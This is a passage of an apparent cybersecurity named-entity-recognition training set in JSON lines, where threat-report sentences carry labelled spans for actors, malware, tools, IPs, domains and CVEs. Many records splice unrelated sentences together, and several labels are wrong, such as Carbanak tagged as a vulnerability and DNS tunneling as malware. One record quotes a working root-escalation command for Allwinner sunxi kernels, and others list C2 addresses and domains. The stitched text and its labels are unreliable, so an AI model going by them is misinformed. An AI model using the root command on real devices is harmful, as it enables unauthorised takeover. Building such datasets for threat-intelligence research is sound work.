that was used a year later by CloudDuke .", "spans": {"MALWARE: CozyDuke": [[12, 20]], "TOOL: emails": [[36, 42], [123, 129]], "TOOL: e-fax": [[68, 73]], "TOOL: fax": [[162, 165]], "MALWARE: CloudDuke": [[223, 232]]}, "info": {"id": "cyberner_stix_train_001365", "source": "cyberner_stix_train"}} {"text": "Drive-by downloads and multiple rooting exploits The malware uses a variety of methods to infect devices . We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia . 
APT33 : 64.251.19.216 srvhost.servehttp.com . The next step is to collect some information about the victim system to send them to the C2 server .", "spans": {"ORGANIZATION: BAE Systems": [[216, 227]], "THREAT_ACTOR: APT33": [[256, 261]], "IP_ADDRESS: 64.251.19.216": [[264, 277]], "DOMAIN: srvhost.servehttp.com": [[278, 299]], "SYSTEM: C2 server": [[391, 400]]}, "info": {"id": "cyberner_stix_train_001366", "source": "cyberner_stix_train"}} {"text": "The threat actors have used discrete infrastructure clusters that share matching hosting and registration characteristics .", "spans": {}, "info": {"id": "cyberner_stix_train_001367", "source": "cyberner_stix_train"}} {"text": "You can find a full list with short descriptions in the Appendix . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations , and has also targeted European and North American nations .", "spans": {"THREAT_ACTOR: NewsBeef": [[95, 103]], "THREAT_ACTOR: MuddyWater": [[271, 281]]}, "info": {"id": "cyberner_stix_train_001368", "source": "cyberner_stix_train"}} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "MALWARE: Corkow": [[224, 230]]}, "info": {"id": "cyberner_stix_train_001369", "source": "cyberner_stix_train"}} {"text": "Our research team was able to identify several instances of this activity by cross-referencing data from breached devices with Google Play app reviews . 
In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . the variable v2 in pseudocode is a register operand ( ecx ) WarDefense extrinsic In the 21st century it would be irresponsible to ignore the fact that nation states and even patriot hackers play in either initiating or defending against adversaries .", "spans": {"SYSTEM: Google Play": [[127, 138]], "THREAT_ACTOR: REDBALDKNIGHT": [[163, 176]], "MALWARE: decoy documents": [[257, 272]], "THREAT_ACTOR: patriot hackers": [[487, 502]], "THREAT_ACTOR: adversaries": [[550, 561]]}, "info": {"id": "cyberner_stix_train_001370", "source": "cyberner_stix_train"}} {"text": "Microsoft Defender for Endpoint on Android further enriches organizations ’ visibility into malicious activity , empowering them to comprehensively prevent , detect , and respond to against attack sprawl and cross-domain incidents . The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 . Occasionally, we encounter some clever and creative ways these malicious archives are . CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives .", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "SYSTEM: Android": [[35, 42]], "THREAT_ACTOR: Ke3chang": [[237, 245]], "THREAT_ACTOR: attackers": [[246, 255]], "TOOL: MyWeb": [[273, 278]], "MALWARE: CADDYWIPER": [[404, 414]]}, "info": {"id": "cyberner_stix_train_001371", "source": "cyberner_stix_train"}} {"text": "If rooting is successful , the attacker has full control of the device and can execute privileged commands remotely . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" . 
In the following example , US by the numbers", "spans": {"THREAT_ACTOR: hacker group": [[137, 149]], "THREAT_ACTOR: BlackOasis": [[178, 188]]}, "info": {"id": "cyberner_stix_train_001372", "source": "cyberner_stix_train"}} {"text": "Admin panel The administration panel shows the application configuration , which matches the commands from the C2 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools . To achieve this , the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation . For the latest protection updates , please visit the Symantec Protection Bulletin .", "spans": {"THREAT_ACTOR: APT10": [[138, 143]], "ORGANIZATION: Symantec": [[490, 498]]}, "info": {"id": "cyberner_stix_train_001373", "source": "cyberner_stix_train"}} {"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . 
n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants .", "spans": {"TOOL: xlsm file": [[38, 47]], "MALWARE: it": [[50, 52]], "MALWARE: DNS tunneling": [[224, 237]]}, "info": {"id": "cyberner_stix_train_001374", "source": "cyberner_stix_train"}} {"text": "These results indicated that the threat actors leveraged the Altiris management platform installed at the client site , along with compromised domain credentials associated with the Altiris system , to move laterally within the compromised environment .", "spans": {"TOOL: Altiris": [[61, 68], [182, 189]]}, "info": {"id": "cyberner_stix_train_001375", "source": "cyberner_stix_train"}} {"text": "For the victims deemed interesting enough , the Dukes would then deploy a different toolset .", "spans": {"THREAT_ACTOR: Dukes": [[48, 53]]}, "info": {"id": "cyberner_stix_train_001376", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //www [ . As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 . For this post the following sample was analyzed . 
LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": {"TOOL: Cannon tool": [[72, 83]], "THREAT_ACTOR: Sofacy group": [[90, 102]], "THREAT_ACTOR: Fancy Bear": [[109, 119]], "THREAT_ACTOR: APT28": [[122, 127]], "THREAT_ACTOR: STRONTIUM": [[130, 139]], "THREAT_ACTOR: Pawn Storm": [[142, 152]], "THREAT_ACTOR: Sednit": [[155, 161]], "ORGANIZATION: government": [[198, 208]], "THREAT_ACTOR: LockBit": [[352, 359]], "ORGANIZATION: US organizations": [[406, 422]], "ORGANIZATION: CISA": [[492, 496]]}, "info": {"id": "cyberner_stix_train_001377", "source": "cyberner_stix_train"}} {"text": "We do not have any strong ties to connect the current attacks exploiting this vulnerability in SharePoint with the Emissary Panda attacks carried out in April .", "spans": {"TOOL: SharePoint": [[95, 105]], "THREAT_ACTOR: Emissary Panda": [[115, 129]]}, "info": {"id": "cyberner_stix_train_001378", "source": "cyberner_stix_train"}} {"text": "If the threat reappears on the device after the first installation , it means that the malware managed to install the persistency module in the System directory . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 .", "spans": {"VULNERABILITY: Carbanak": [[163, 171]], "THREAT_ACTOR: MuddyWater": [[308, 318]]}, "info": {"id": "cyberner_stix_train_001379", "source": "cyberner_stix_train"}} {"text": "Much like the MiniDuke expose in February 2013 , the Dukes again appeared to prioritize continuing operations over staying hidden .", "spans": {"MALWARE: MiniDuke": [[14, 22]], "THREAT_ACTOR: Dukes": [[53, 58]]}, "info": {"id": "cyberner_stix_train_001380", "source": "cyberner_stix_train"}} {"text": "Figure 5 . 
Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . The campaign of April 2017 used pertinent documents containing potentially sensitive data .", "spans": {"MALWARE: KHNP documents": [[31, 45]], "THREAT_ACTOR: actors": [[65, 71]], "ORGANIZATION: South Korean Government": [[145, 168]]}, "info": {"id": "cyberner_stix_train_001381", "source": "cyberner_stix_train"}} {"text": "These steps were taken over a 13-day period , but only on specific days .", "spans": {}, "info": {"id": "cyberner_stix_train_001382", "source": "cyberner_stix_train"}} {"text": "Their publicly advertised products include CCTV management systems , surveillance drones , face and license plate recognition systems . The attackers actively sent out malicious documents and maintained several IP addresses for command and control . The backdoor has the following capabilities : Organizations can have hundreds , thousands or more of unremediated vulnerabilities that could open the door for an attacker .", "spans": {"VULNERABILITY: unremediated vulnerabilities": [[351, 379]], "THREAT_ACTOR: attacker": [[412, 420]]}, "info": {"id": "cyberner_stix_train_001383", "source": "cyberner_stix_train"}} {"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . 
Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": {"THREAT_ACTOR: Emissary Panda": [[4, 18]], "TOOL: China Chopper": [[43, 56]], "VULNERABILITY: CVE-2019-0604": [[264, 277]], "FILEPATH: date string": [[315, 326]], "FILEPATH: date codes": [[344, 354]], "MALWARE: Bookworm": [[400, 408]]}, "info": {"id": "cyberner_stix_train_001384", "source": "cyberner_stix_train"}} {"text": "icons Figure 11 : Icons used to pose as famous apps . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . APT17 : Deputy Dog .", "spans": {"ORGANIZATION: DeepSight": [[110, 119]], "THREAT_ACTOR: Buckeye": [[215, 222]], "THREAT_ACTOR: APT17": [[300, 305]], "THREAT_ACTOR: Deputy Dog": [[308, 318]]}, "info": {"id": "cyberner_stix_train_001385", "source": "cyberner_stix_train"}} {"text": "In at least one case however , the email instead contained a link to a zip archive file named “ Office Monkeys LOL Video.zip ” , which was hosted on the DropBox cloud storage service .", "spans": {"TOOL: email": [[35, 40]], "TOOL: zip": [[71, 74]], "FILEPATH: Office Monkeys LOL Video.zip": [[96, 124]], "TOOL: DropBox": [[153, 160]]}, "info": {"id": "cyberner_stix_train_001386", "source": "cyberner_stix_train"}} {"text": "Sofacy , one of the most active APT we monitor , continues to spearphish their way into targets , reportedly widely phishes for credentials , and infrequently participates in server side activity ( including host compromise with BeEF deployment , for example ) .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "TOOL: BeEF": [[229, 233]]}, "info": {"id": "cyberner_stix_train_001387", "source": "cyberner_stix_train"}} {"text": "FormBook is a browser form stealer/keylogger that is under active development . 
Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": {"TOOL: FormBook": [[0, 8]], "TOOL: stealer/keylogger": [[27, 44]], "MALWARE: .doc files": [[134, 144]], "FILEPATH: RTF documents": [[165, 178]], "VULNERABILITY: exploit": [[195, 202]], "VULNERABILITY: CVE-2017-8570": [[203, 216]], "TOOL: Composite Moniker": [[219, 236]]}, "info": {"id": "cyberner_stix_train_001388", "source": "cyberner_stix_train"}} {"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor .", "spans": {"THREAT_ACTOR: cyber criminals": [[31, 46]], "TOOL: spearphishing emails": [[51, 71]], "TOOL: attachments:": [[94, 106]], "TOOL: documents": [[117, 126], [209, 218]], "VULNERABILITY: CVE-2017-11882": [[189, 203]], "FILEPATH: Bemstour": [[243, 251]], "MALWARE: DoublePulsar backdoor": [[305, 326]]}, "info": {"id": "cyberner_stix_train_001389", "source": "cyberner_stix_train"}} {"text": "Android users warned of malware attack spreading via SMS FEB 16 , 2016 Security researchers are warning owners of Android smartphones about a new malware attack , spreading via SMS text messages . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 . the callback is executed just once in the implementation . 
The campaign was carried out in late 2020 , but it was detected , analyzed , and published in late March 2021 .", "spans": {"SYSTEM: Android": [[0, 7], [114, 121]], "THREAT_ACTOR: group": [[201, 206]], "THREAT_ACTOR: Gallmaker": [[238, 247]]}, "info": {"id": "cyberner_stix_train_001390", "source": "cyberner_stix_train"}} {"text": "FakeSpy Masquerades as Postal Service Apps Around the World July 1 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating a new campaign involving FakeSpy , an Android mobile malware that emerged around October 2017 . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7], [159, 166]], "ORGANIZATION: Cybereason Nocturnus": [[91, 111]], "SYSTEM: Android": [[172, 179]], "TOOL: Komplex": [[230, 237]], "THREAT_ACTOR: APT28": [[274, 279]], "THREAT_ACTOR: Gallmaker": [[351, 360]], "ORGANIZATION: government": [[437, 447]], "ORGANIZATION: military": [[450, 458]], "ORGANIZATION: defense sectors": [[464, 479]]}, "info": {"id": "cyberner_stix_train_001391", "source": "cyberner_stix_train"}} {"text": "NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . 
The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "THREAT_ACTOR: activity group": [[16, 30]], "ORGANIZATION: Microsoft": [[83, 92]], "TOOL: Wingbird": [[96, 104]], "ORGANIZATION: anti-government separatists": [[219, 246]]}, "info": {"id": "cyberner_stix_train_001392", "source": "cyberner_stix_train"}} {"text": "The threat actors demonstrated the ability to adapt when reentering a network after an eviction , overcoming technical barriers constructed by network defenders .", "spans": {}, "info": {"id": "cyberner_stix_train_001393", "source": "cyberner_stix_train"}} {"text": "We recently observed Hancitor attacks against some of our FireEye Exploit Guard customers . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": {"THREAT_ACTOR: Hancitor": [[21, 29]], "ORGANIZATION: FireEye": [[58, 65]], "ORGANIZATION: telecoms companies": [[185, 203]], "ORGANIZATION: customers": [[229, 238]]}, "info": {"id": "cyberner_stix_train_001395", "source": "cyberner_stix_train"}} {"text": "These types of apps tend to store their data in databases and , as an example , HenBox accesses Voxer ’ s database from the file “ /data/data/com.rebelvox.voxer/databases/rv.db ” . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . 
Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows .", "spans": {"MALWARE: HenBox": [[80, 86]], "TOOL: HIGHNOON": [[181, 189]], "THREAT_ACTOR: APT41": [[245, 250]], "THREAT_ACTOR: APT17": [[270, 275]], "ORGANIZATION: semiconductor": [[294, 307]], "ORGANIZATION: chemical manufacturers": [[312, 334]], "MALWARE: Komplex": [[337, 344]], "THREAT_ACTOR: Sofacy": [[427, 433], [461, 467]], "MALWARE: Carberp": [[440, 447]], "SYSTEM: Windows": [[525, 532]]}, "info": {"id": "cyberner_stix_train_001396", "source": "cyberner_stix_train"}} {"text": "Figure 10 . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Filename: winnit.exe .", "spans": {"MALWARE: flare-qdb": [[30, 39]], "FILEPATH: winnit.exe": [[108, 118]]}, "info": {"id": "cyberner_stix_train_001397", "source": "cyberner_stix_train"}} {"text": "cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info Talos published its analysis of the BlackWater campaign , related to MuddyWater group . 
The malware internally uses the following files : solhelp.ocx sultry.ocx helpsol.ocx psltre.ocx screentmp.tmp (log file of the keylogger) spadmgr.ocx apsmgrd.ocx wpg.db .", "spans": {"ORGANIZATION: Talos": [[281, 286]], "THREAT_ACTOR: MuddyWater": [[350, 360]], "FILEPATH: solhelp.ocx": [[419, 430]], "FILEPATH: sultry.ocx": [[431, 441]], "FILEPATH: helpsol.ocx": [[442, 453]], "FILEPATH: psltre.ocx": [[454, 464]], "FILEPATH: screentmp.tmp": [[465, 478]], "FILEPATH: spadmgr.ocx": [[507, 518]], "FILEPATH: apsmgrd.ocx": [[519, 530]], "FILEPATH: wpg.db": [[531, 537]]}, "info": {"id": "cyberner_stix_train_001398", "source": "cyberner_stix_train"}} {"text": "We observed these samples deployed only against Hebrew-speaking targets .", "spans": {}, "info": {"id": "cyberner_stix_train_001399", "source": "cyberner_stix_train"}} {"text": "Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks .", "spans": {"THREAT_ACTOR: APT40": [[14, 19]], "ORGANIZATION: universities": [[84, 96]], "ORGANIZATION: government institutions": [[180, 203]]}, "info": {"id": "cyberner_stix_train_001400", "source": "cyberner_stix_train"}} {"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices . 
The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) . Outlaw : http://www.minpop.com/sk12pack/idents.php Command and control . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"SYSTEM: Android": [[256, 263]], "ORGANIZATION: Allwinner": [[284, 293], [356, 365]], "SYSTEM: ARM": [[294, 297]], "SYSTEM: Linux": [[342, 347]], "SYSTEM: Banana Pi micro-PCs": [[392, 411]], "SYSTEM: Orange Pi": [[414, 423]], "THREAT_ACTOR: Outlaw": [[662, 668]], "URL: http://www.minpop.com/sk12pack/idents.php": [[671, 712]], "TOOL: Command and control": [[713, 732]]}, "info": {"id": "cyberner_stix_train_001401", "source": "cyberner_stix_train"}} {"text": "It ’ s not a definite correlation , but Bouncing Golf also seems to have a connection with Domestic Kitten due to similarities we found in their code . Attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks . During the investigation related to the GRIFFON infrastructure , we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company . 
Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": {"MALWARE: Bouncing Golf": [[40, 53]], "MALWARE: Domestic Kitten": [[91, 106]], "THREAT_ACTOR: ScarCruft": [[265, 274]], "MALWARE: GRIFFON": [[343, 350], [430, 437]], "TOOL: WHOIS": [[407, 412]], "TOOL: C2": [[438, 440]], "MALWARE: commodity malware": [[503, 520]]}, "info": {"id": "cyberner_stix_train_001402", "source": "cyberner_stix_train"}} {"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan .", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "ORGANIZATION: FireEye": [[37, 44]], "THREAT_ACTOR: Tropic Trooper": [[213, 227]], "ORGANIZATION: government institutions": [[245, 268]], "ORGANIZATION: energy industry": [[282, 297]]}, "info": {"id": "cyberner_stix_train_001403", "source": "cyberner_stix_train"}} {"text": "In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . 
The target domain ’s visitors will be redirected into an e-banking login page that looks and acts normally , but is located on dark web sites .", "spans": {"TOOL: SWC": [[67, 70]], "ORGANIZATION: international industry organization": [[94, 129]], "ORGANIZATION: aerospace": [[144, 153]], "ORGANIZATION: academic": [[156, 164]], "ORGANIZATION: media": [[167, 172]], "ORGANIZATION: technology": [[175, 185]], "ORGANIZATION: government": [[188, 198]], "ORGANIZATION: utilities organizations": [[205, 228]]}, "info": {"id": "cyberner_stix_train_001404", "source": "cyberner_stix_train"}} {"text": "One of these webshells is the open source AntSword webshell freely available on Github , which is remarkably similar to the infamous China Chopper webshell .", "spans": {"TOOL: AntSword": [[42, 50]], "TOOL: Github": [[80, 86]], "TOOL: Chopper": [[139, 146]]}, "info": {"id": "cyberner_stix_train_001405", "source": "cyberner_stix_train"}} {"text": "Based on received commands , it can either download malicious apps or switch the C & C Twitter account to another one . Between July 2015 and February 2016 , Scattered Canary’s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . 
Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank .", "spans": {"SYSTEM: Twitter": [[87, 94]], "THREAT_ACTOR: Scattered Canary’s": [[158, 176]], "THREAT_ACTOR: attacker": [[504, 512]], "ORGANIZATION: Bangladesh Central Bank": [[553, 576]]}, "info": {"id": "cyberner_stix_train_001406", "source": "cyberner_stix_train"}} {"text": "This is a pseudo-unique ID for each machine , based on install date taken from the registry , volume serial number , OS version and service pack , Processor architecture , and computer name .", "spans": {}, "info": {"id": "cyberner_stix_train_001407", "source": "cyberner_stix_train"}} {"text": "The results also revealed indications that PsExec , a popular system administration tool for executing commands on remote systems , was run against several target hosts to spawn shells on them .", "spans": {"TOOL: PsExec": [[43, 49]]}, "info": {"id": "cyberner_stix_train_001408", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 69.87.223.26:8080/p .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: 69.87.223.26:8080/p": [[11, 30]]}, "info": {"id": "cyberner_stix_train_001409", "source": "cyberner_stix_train"}} {"text": "Both components contain an identical VBA macro code as shown above , each containing two different embedded payloads : one is an executable binary file and the other is a .docm file . 
attachedTemplate.dotm dropped the following :", "spans": {"TOOL: VBA": [[37, 40]], "FILEPATH: .docm": [[171, 176]], "FILEPATH: attachedTemplate.dotm": [[184, 205]]}, "info": {"id": "cyberner_stix_train_001410", "source": "cyberner_stix_train"}} {"text": "ESET researchers have found that Turla , the notorious state-sponsored cyberespionage group , has added a fresh weapon to its arsenal that is being used in new campaigns targeting embassies and consulates in the post-Soviet states . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[33, 38]], "FILEPATH: regsvr32.exe": [[258, 270]], "THREAT_ACTOR: APT19": [[315, 320]], "ORGANIZATION: law firms": [[352, 361]]}, "info": {"id": "cyberner_stix_train_001411", "source": "cyberner_stix_train"}} {"text": "The Campaign achieved exponential growth from June to December 2018 with the infection number staying stable into early 2019 . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . Dexphot : 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 . 
The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": {"MALWARE: CONFUCIUS_A": [[156, 167]], "TOOL: SNEEPY": [[286, 292]], "TOOL: ByeByeShell": [[299, 310]], "ORGANIZATION: Rapid7": [[331, 337]], "MALWARE: Dexphot": [[348, 355]], "FILEPATH: 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3": [[358, 422]], "SYSTEM: Exchange Server": [[502, 517]]}, "info": {"id": "cyberner_stix_train_001412", "source": "cyberner_stix_train"}} {"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK .", "spans": {"MALWARE: wuaupdt.exe": [[0, 11]], "TOOL: CMD": [[17, 20]], "FILEPATH: KHRAT": [[90, 95]], "MALWARE: backdoor trojan": [[101, 116]], "THREAT_ACTOR: DragonOK": [[181, 189]]}, "info": {"id": "cyberner_stix_train_001413", "source": "cyberner_stix_train"}} {"text": "Like the “ MiniDuke loader ” , these “ John Kasai ” domains also provide a common thread tying together much of the tools and infrastructure of the Dukes .", "spans": {"MALWARE: MiniDuke": [[11, 19]], "THREAT_ACTOR: Dukes": [[148, 153]]}, "info": {"id": "cyberner_stix_train_001414", "source": "cyberner_stix_train"}} {"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively 
join the investigation . The shellcode starts in a fairly standard way – by walking the list of loaded modules in order to find the base of kernel32.dll library . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[525, 544]], "ORGANIZATION: Check Point": [[569, 580]], "FILEPATH: kernel32.dll": [[753, 765]], "VULNERABILITY: CVE-2022 - 41040": [[824, 840]]}, "info": {"id": "cyberner_stix_train_001415", "source": "cyberner_stix_train"}} {"text": "To date , Unit 42 has seen four of the seven ( the first three in the list below , along with cdncool [ . APT41 has been observed creating a RAR archive of targeted files for exfiltration . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard TIME timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": {"THREAT_ACTOR: APT41": [[106, 111]], "MALWARE: GeminiDuke samples": [[264, 282]], "MALWARE: GeminiDuke": [[427, 437]]}, "info": {"id": "cyberner_stix_train_001416", "source": "cyberner_stix_train"}} {"text": "In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle . 
All of the traffic will be hijacked into the first proxy ( port 5555 ) with the victim ’s external IP address as parameter .", "spans": {"ORGANIZATION: information technology": [[114, 136]], "ORGANIZATION: IT": [[139, 141]]}, "info": {"id": "cyberner_stix_train_001417", "source": "cyberner_stix_train"}} {"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"ORGANIZATION: NSA": [[48, 51]], "ORGANIZATION: civil society": [[272, 285]], "ORGANIZATION: human rights organizations": [[290, 316]], "ORGANIZATION: diaspora": [[446, 454]]}, "info": {"id": "cyberner_stix_train_001418", "source": "cyberner_stix_train"}} {"text": "Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": {"MALWARE: JAR": [[36, 39]], "TOOL: Order_2018.jar": [[100, 114]], "ORGANIZATION: Microsoft": [[150, 159]], "THREAT_ACTOR: Barium": [[211, 217]], "FILEPATH: Win32/ShadowPad.A": [[256, 273]]}, "info": {"id": "cyberner_stix_train_001419", "source": "cyberner_stix_train"}} {"text": "Once the targeted website is launched , the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) . 
This function implements the initial handshake which consists of exchanging 16 bytes , 0x00001985 and 0x00000425, Iranian officials state the delegations agreed that good progress was made during the seventh round that ended 10 days earlier , and there is now a suitable framework to take the talks forward .", "spans": {"SYSTEM: Google ads": [[117, 127]], "ORGANIZATION: Department of Homeland Security": [[217, 248]], "ORGANIZATION: DHS": [[251, 254]], "ORGANIZATION: Iranian officials": [[373, 390]]}, "info": {"id": "cyberner_stix_train_001420", "source": "cyberner_stix_train"}} {"text": "Late last year , after receiving a list of suspicious package names from Lookout , we discovered that a few dozen Android devices may have installed an application related to Pegasus , which we named Chrysaor . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . APT33 : 192.119.15.42 [REDACTED].ddns.net . With an understanding of the basic motivations that drive cyberattacks organizations can better identify where their own assets may be at risk and thereby more efficiently and effectively address identified risks .", "spans": {"ORGANIZATION: Lookout": [[73, 80]], "SYSTEM: Android": [[114, 121]], "MALWARE: Pegasus": [[175, 182]], "MALWARE: Chrysaor": [[200, 208]], "THREAT_ACTOR: Leafminer": [[211, 220]], "VULNERABILITY: SMB vulnerabilities": [[335, 354]], "ORGANIZATION: Microsoft": [[368, 377]], "THREAT_ACTOR: APT33": [[380, 385]], "IP_ADDRESS: 192.119.15.42": [[388, 401]], "DOMAIN: [REDACTED].ddns.net": [[402, 421]]}, "info": {"id": "cyberner_stix_train_001421", "source": "cyberner_stix_train"}} {"text": "Additionally , during a period of several days , our infected test device was never remotely disinfected by the operators . 
